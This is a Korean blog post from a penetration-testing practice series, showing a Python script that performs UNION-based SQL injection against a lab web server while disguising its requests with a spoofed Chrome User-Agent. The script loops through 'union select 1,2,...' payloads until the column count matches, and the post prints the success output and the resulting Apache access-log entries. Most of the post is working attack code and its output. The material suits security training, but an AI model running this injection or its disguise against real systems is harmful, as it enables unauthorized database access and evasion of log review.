UNION 공격코드 작성하기 (Chrome 으로 위장)

Linux/모의해킹

UNION 공격코드 작성하기 (Chrome 으로 위장)

GGkeeper 2022. 1. 26. 21:19

실습> union 공격코드 작성하기

1. 소스코드
-- requests03.py --
"""
파일명 : requests03.py
프로그램 설명 : union 공격을 위한 예제
"""

import requests
import bs4
import time

id = 'bbs1 union select 1'
m = 'list'

agentValue = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
userAgent = {'User-Agent': agentValue}

for i in range(1,51):
    if i > 1:
        id = id + ',' + str(i)
    url = f"http://192.168.108.101/?id={id}&m={m}"  # 접속할 URL
    r = requests.get(url, headers=userAgent)
    soup = bs4.BeautifulSoup(r.text, 'html.parser')
    if soup.find('b') == None:
        print('UNION 매칭 OK!!!\n'
              f'{i} : {url} <<<')
        break
-- requests03.py --

2. 로그 분석
# tail -f /var/log/httpd/server1.kr-access_log
   :
   :(생략)

3. 스크립트 실행
requests03.py 파일를 실행한다.
UNION 공격에 성공되면 아래처럼 나올 것이다.

UNION 매칭 OK!!!
8 : http://192.168.108.101/?id=bbs1 union select 1,2,3,4,5,6,7,8&m=list <<<

4. 로그 확인
# tail -f /var/log/httpd/server1.kr-access_log
   :
   :(생략)
192.168.108.1 - - [26/Jan/2022:19:22:47 +0900] "GET /?id=bbs1%20union%20select%201&m=list HTTP/1.1" 200 3550 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
192.168.108.1 - - [26/Jan/2022:19:22:47 +0900] "GET /?id=bbs1%20union%20select%201,2&m=list HTTP/1.1" 200 3554 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
192.168.108.1 - - [26/Jan/2022:19:22:47 +0900] "GET /?id=bbs1%20union%20select%201,2,3&m=list HTTP/1.1" 200 3558 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
192.168.108.1 - - [26/Jan/2022:19:22:47 +0900] "GET /?id=bbs1%20union%20select%201,2,3,4&m=list HTTP/1.1" 200 3562 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
192.168.108.1 - - [26/Jan/2022:19:22:47 +0900] "GET /?id=bbs1%20union%20select%201,2,3,4,5&m=list HTTP/1.1" 200 3566 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
192.168.108.1 - - [26/Jan/2022:19:22:47 +0900] "GET /?id=bbs1%20union%20select%201,2,3,4,5,6&m=list HTTP/1.1" 200 3570 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
192.168.108.1 - - [26/Jan/2022:19:22:47 +0900] "GET /?id=bbs1%20union%20select%201,2,3,4,5,6,7&m=list HTTP/1.1" 200 3574 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
192.168.108.1 - - [26/Jan/2022:19:22:47 +0900] "GET /?id=bbs1%20union%20select%201,2,3,4,5,6,7,8&m=list HTTP/1.1" 200 4483 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"

'Linux > 모의해킹' 카테고리의 다른 글

WAPPLES 설정하기 (호스트키 변경, SSH 접속) (0)	2022.01.30
쿠키값 한 개만 추출 (1)	2022.01.26
Apache 웹서버 로그 분석 (0)	2022.01.26
UNION 공격코드 작성하기 (Python) (0)	2022.01.26
get.html (0)	2022.01.26

현재글UNION 공격코드 작성하기 (Chrome 으로 위장)

정보 보안 분야

iptables, Linux, html, 설치, physical, 가상 호스트, Network, 도메인, php, for 문, http, 반복문, 리눅스, 1계층, Netcat, ubuntu, 서버, 파이썬, Python, 물리계층,

Today :
Yesterday :

일	월	화	수	목	금	토
1	2	3	4	5	6	7
8	9	10	11	12	13	14
15	16	17	18	19	20	21
22	23	24	25	26	27	28

정보 보안 분야